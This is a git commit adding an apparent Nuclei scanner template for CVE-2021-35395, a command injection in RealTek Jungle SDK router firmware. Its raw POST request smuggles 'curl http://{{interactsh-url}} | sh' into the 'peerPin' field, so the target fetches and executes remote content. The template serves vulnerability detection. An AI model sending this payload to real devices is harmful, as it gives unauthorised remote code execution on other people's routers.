Create CVE-2021-35395 template

king-alexander · king-alexander · commit 5416d4cf329c · 2023-10-05T11:21:04.000-05:00
diff --git a/http/cves/2021/CVE-2021-35395.yaml b/http/cves/2021/CVE-2021-35395.yaml
@@ -0,0 +1,25 @@
+id: CVE-2021-35395
+info:
+  name: RealTek Jungle SDK - Arbitrary Command Injection
+  author: king-alexander
+  severity: critical
+  description: There is a command injection vulnerability on the "formWsc" page of the management interface.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-35395
+    - https://blogs.juniper.net/en-us/threat-research/attacks-continue-against-realtek-vulnerabilities
+  tags: cve,kev
+
+http:
+  - raw:
+    - |
+        POST /goform/formWsc HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        # The 'peerPin' parameter is unsanitized. So we can inject arbitrary commands after the statement that uses the 'peerPin' value.
+        submit-url=%2Fwlwps.asp&resetUnCfg=0&peerPin=12345678;curl http://{{interactsh-url}} | sh;&setPIN=Start+PIN&configVxd=off&resetRptUnCfg=0&peerRptPin= 
+
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"
